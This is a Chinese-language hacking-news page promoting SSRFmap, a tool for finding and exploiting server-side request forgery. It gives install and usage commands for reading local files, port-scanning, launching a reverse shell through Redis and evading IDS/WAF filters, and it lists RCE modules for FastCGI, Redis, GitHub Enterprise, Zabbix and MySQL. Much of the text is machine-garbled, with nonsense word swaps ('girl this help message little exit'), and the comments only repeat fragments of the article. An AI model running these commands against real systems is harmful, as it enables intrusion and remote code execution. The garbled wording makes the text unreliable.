一款功能强大的自动化SSRF模糊测试&漏洞利用工具

一款功能强大的自动化SSRF模糊测试&漏洞利用工具

黑客软件hacker2019-06-07 12:50:0911774A+A-

SSRF,即服务端post请求仿冒,许多互联网犯罪嫌疑人都是运用SSRF来进攻或侵入网络服务。今日人们给大伙儿详细介绍的这个专用工具全名是SSRFmap,它能够找寻并运用总体目标网络服务中的SSRF系统漏洞。

SSRFmap以Burppost请求文档做为键入,科学研究工作人员能够运用主要参数选择项来操纵模糊不清检测的实际操作系统进程。

新项目详细地址

SSRFmap:【GitHub传送门】

专用工具安裝

大伙儿能够立即从GitHub编码库中复制该新项目至当地:

git clone https://github.Com/swisskyrepo/SSRFmap

Cd SSRFmap/

python3 ssrfmap.py

 

usage:ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lportLPORT] [--level LEVEL]

 

optional arguments:

  -h, --help    girl this help message little exit

  -r REQFILE    SSRF Request file

  -p PARAM      SSRF Parameter To target

  -m MODULES    SSRF Modules To enable

  -l HANDLER    Start an handler For a reverseshell

  --lhost LHOST LHOST reverse shell

  --lport LPORT LPORT reverse shell

  --level [LEVEL]  Level of test To perform (1-5, default: 1)

专用工具应用

SSRFmap的默认设置使用说明给出:

#Launch a portscan On localhost little read default files

python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

 

#Triggering a reverse shell On a Redis

python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242-l 4242

 

# -lcreate a listener For reverse shell On the specified port

#--lhost little --lport work like In Metasploit, these values are used To create areverse shell payload

#--level : ability To tweak payloads In order To bypass some IDS/WAF. e.g:127.0.0.1 -> [::] -> 0000: -> 有限责任公司

老大姐能够应用data/example.py来检测架构是不是可以一切正常运作:

FLASK_app软件=data/example.pyflask run &

python ssrfmap.py -r data/request.txt -p url -m readfiles

程序模块

SSRFmap已融合了下述程序模块,大伙儿能够应用-m主要参数来挑选应用:

控制模块名字 

控制模块叙述 

fastcgi 

FastCGI RCE 

redis 

Redis RCE 

github 

Github商业版RCE < 2.8.7 


zabbix 

Zabbix RCE 

mysql 

MySQL指令实行 


docker 


Docker  Infoleaks(API) 

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 忿咬痴妓2022-06-02 04:26:23
  • SSRF,即服务端post请求仿冒,许多互联网犯罪嫌疑人都是运用SSRF来进攻或侵入网络服务。今日人们给大伙儿详细介绍的这个专用工具全名是SSRFmap,它能够找寻并运用总体目标网络服务中的SSRF系统漏洞。 SSRFmap以Burppost请求文档做为键入,科学研究工作人员能够运用主要参数
  • 青迟欢烬2022-06-02 08:04:53
  • astcgi  FastCGI RCE  redis  Redis RCE 
  • 性许妄愿2022-06-02 01:34:26
  • erseshell   --lhost LHOST LHOST reverse shell   --lport LPORT LPORT reverse shell   --level [LEVEL]  Level of test To perform (1
  • 温人俛就2022-06-02 06:05:49
  • Level of test To perform (1-5, default: 1) 专用工具应用 SSRFmap的默认设置使用说明给出: #Launch a portscan On localhost little read default

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理